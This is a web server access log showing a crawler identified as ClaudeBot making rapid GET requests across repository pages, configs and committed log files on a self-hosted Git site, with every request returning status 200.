"/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 9838] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json?display=rendered" [Client 216.73.216.188] [Length 11109] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx" [Client 216.73.216.188] [Length 11607] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 9899] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" [Client 216.73.216.188] [Length 11048] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2F.TemporaryDocument%2FMIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log" [Client 216.73.216.188] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md?display=rendered" [Client 216.73.216.188] [Length 13308] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx?display=rendered" [Client 216.73.216.188] [Length 10885] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx" [Client 216.73.216.188] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json?display=rendered" [Client 216.73.216.188] [Length 10898] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fassets%2Fcss%2Fstyle.css" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fassets%2Fcss%2Fstyle.css" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 451] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log" [Client 216.73.216.188] [Length 43288] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md?display=source" [Client 216.73.216.188] [Length 22757] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx?display=rendered" [Client 216.73.216.188] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx?display=rendered" [Client 216.73.216.188] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=nginx-reverse-proxy.conf" [Client 216.73.216.188] [Length 22527] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx?display=rendered" [Client 216.73.216.188] [Length 10878] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml" [Client 216.73.216.188] [Length 10096] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 216.73.216.188] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12?display=rendered" [Client 216.73.216.188] [Length 10995] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html?display=source" [Client 216.73.216.188] [Length 14374] [Gzip 4.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj?display=rendered" [Client 216.73.216.188] [Length 11131] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf" [Client 216.73.216.188] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2F.Notebook" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py" [Client 216.73.216.188] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf" [Client 216.73.216.188] [Length 1140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 216.73.216.188] [Length 947] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts" [Client 216.73.216.188] [Length 9851] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" [Client 216.73.216.188] [Length 9868] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html?display=rendered" [Client 216.73.216.188] [Length 14516] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py?display=source" [Client 216.73.216.188] [Length 13066] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js?display=rendered" [Client 216.73.216.188] [Length 10973] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" [Client 216.73.216.188] [Length 9845] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html?display=source" [Client 216.73.216.188] [Length 30988] [Gzip 9.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 9829] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2?display=rendered" [Client 216.73.216.188] [Length 10967] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx?display=rendered" [Client 216.73.216.188] [Length 10882] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fassets%2Fjs%2Fscript.js" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log" [Client 216.73.216.188] [Length 5722] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log" [Client 216.73.216.188] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" [Client 216.73.216.188] [Length 39193] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf" [Client 216.73.216.188] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fassets%2Fjs%2Fscript.js" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log" [Client 216.73.216.188] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log" [Client 216.73.216.188] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf" [Client 216.73.216.188] [Length 11910] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json?display=source" [Client 216.73.216.188] [Length 11030] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache?display=rendered" [Client 216.73.216.188] [Length 10941] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf" [Client 216.73.216.188] [Length 1981] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log?display=rendered" [Client 216.73.216.188] [Length 10965] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" [Client 216.73.216.188] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 9856] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts" [Client 216.73.216.188] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log" [Client 216.73.216.188] [Length 38982] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log" [Client 216.73.216.188] [Length 102161] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html?display=source" [Client 216.73.216.188] [Length 15712] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" [Client 216.73.216.188] [Length 42638] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md?display=source" [Client 216.73.216.188] [Length 11762] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 216.73.216.188] [Length 10917] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.gitignore" [Client 216.73.216.188] [Length 23910] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js?display=rendered" [Client 216.73.216.188] [Length 10958] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" [Client 216.73.216.188] [Length 39264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr 